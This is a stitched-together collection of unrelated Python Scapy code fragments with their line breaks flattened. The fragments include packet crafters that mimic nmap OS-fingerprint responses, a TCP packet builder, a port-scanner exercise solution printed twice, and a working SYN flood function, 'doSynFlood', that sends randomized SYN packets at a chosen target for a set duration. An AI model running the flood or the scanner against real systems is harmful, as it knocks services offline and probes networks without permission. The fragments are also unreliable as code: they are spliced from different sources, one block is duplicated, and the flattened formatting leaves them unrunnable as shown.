def service_craft(pkt, fp, mac, service, type_=False): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.ttl, 16) ip.flags = 0x4000 tcp = TCP() tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport if type_: tcp.flags = 0x018 # PSH / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].ack data = service[pkt[TCP].dport] fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data return fin_pkt else: tcp.flags = 0x012 # SYN / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].seq + 1 fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def seqgen_pkt_craft(pkt, fp, mac, pno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['T1']['TTL'], 16) ip.flags = fp.probe['T1']['DF'] ip.id = fp.ip_id_gen() tcp = TCP() s_val = fp.probe['T1']['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = fp.tcp_seq_gen() a_val = fp.probe['T1']['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe['T1']['F'] tcp.flags = flag_val tcp.window = fp.probe['WIN']['W' + pno] tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport tcp.options = fp.probe['OPS']['O' + pno] rd_val = fp.probe['T1']['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def doSynFlood(origin_ip=None, origin_port=None, target_ip=None, target_port=None, interface=None, duration=None, gap=0): ''' Starts Syn Flood attacks Arguments: origin_ip (str): attacker ip origin_port (int): attacker port target_ip (str): target ip target_port (int): target port interface (str): network interface to use duration (int): duration of the attack gap (int): gap (delay) between packets Returns: None ''' # Check if everything is filled out if target_ip is None: return if target_port is None: return if duration is None: return if gap >= duration: return # Prepare the packet ip_layer = IP() ip_layer.src = origin_ip ip_layer.dst = target_ip tcp_layer = TCP() tcp_layer.sport = origin_port tcp_layer.dport = target_port tcp_layer.flags = "S" # Prepare timings time_start = time() time_end = time_start + duration # Start attack while (time() <= time_end): #duration # Constantly changing values tcp_layer.seq = GenerateRandomSafeSeq() tcp_layer.ack = GenerateRandomSafeSeq() tcp_layer.window = GenerateRandomWindow() attack_packet = ip_layer/tcp_layer # packet to send send(attack_packet, iface=interface) if gap > 0: sleep(gap) #gap
def server_tcp(self, flags, payload=b"", count=True): data_length = max(len(payload), 1) tcp = TCP() tcp.flags = flags tcp.sport = self.service tcp.dport = self.client_port tcp.seq = self.ss tcp.ack = self.sa if count: self.ss += data_length self.ca += data_length packet = Ether(src=self.server.mac, dst=self.client.mac) packet /= IP(src=self.server.ip, dst=self.client.ip) packet /= tcp if len(payload) > 0: packet /= payload self.packets.append(packet)
# BT Port Scanner - Exercise 6.19 Solution from scapy.all import sr1, IP, TCP print "[BT PORT SCANNER]\n" dest = raw_input("Enter destination IP address: ") for i in range(20, 1025): tcp_seg = TCP(dport=i, sport=2057, flags='S') tcp_packet = IP(dst=dest)/tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) if str(type(tcp_res)) == "<type 'NoneType'>": print "[" + str(i) + "] => CLOSED\n" elif tcp_res.haslayer(TCP): if tcp_res.getlayer(TCP).flags == 18: tcp_seg.flags = 'A' tcp_seg.ack = tcp_res.getlayer(TCP).seq + 1 tcp_packet = IP(dst=dest)/tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) print "[" + str(i) + "] => OPEN\n" else: print "[" + str(i) + "] => CLOSED\n"
# BT Port Scanner - Exercise 6.19 Solution from scapy.all import sr1, IP, TCP print "[BT PORT SCANNER]\n" dest = raw_input("Enter destination IP address: ") for i in range(20, 1025): tcp_seg = TCP(dport=i, sport=2057, flags='S') tcp_packet = IP(dst=dest) / tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) if str(type(tcp_res)) == "<type 'NoneType'>": print "[" + str(i) + "] => CLOSED\n" elif tcp_res.haslayer(TCP): if tcp_res.getlayer(TCP).flags == 18: tcp_seg.flags = 'A' tcp_seg.ack = tcp_res.getlayer(TCP).seq + 1 tcp_packet = IP(dst=dest) / tcp_seg tcp_res = sr1(tcp_packet, timeout=1, verbose=0) print "[" + str(i) + "] => OPEN\n" else: print "[" + str(i) + "] => CLOSED\n"
def t2tot7_craft(pkt, fp, mac, tno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe[tno]['TTL'], 16) ip.flags = fp.probe[tno]['DF'] ip.id = random.randint(1, 1000) tcp = TCP() s_val = fp.probe[tno]['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = pkt[TCP].ack + 369 a_val = fp.probe[tno]['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe[tno]['F'] tcp.flags = flag_val w_val = fp.probe[tno]['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport o_val = fp.probe[tno]['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val rd_val = fp.probe[tno]['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt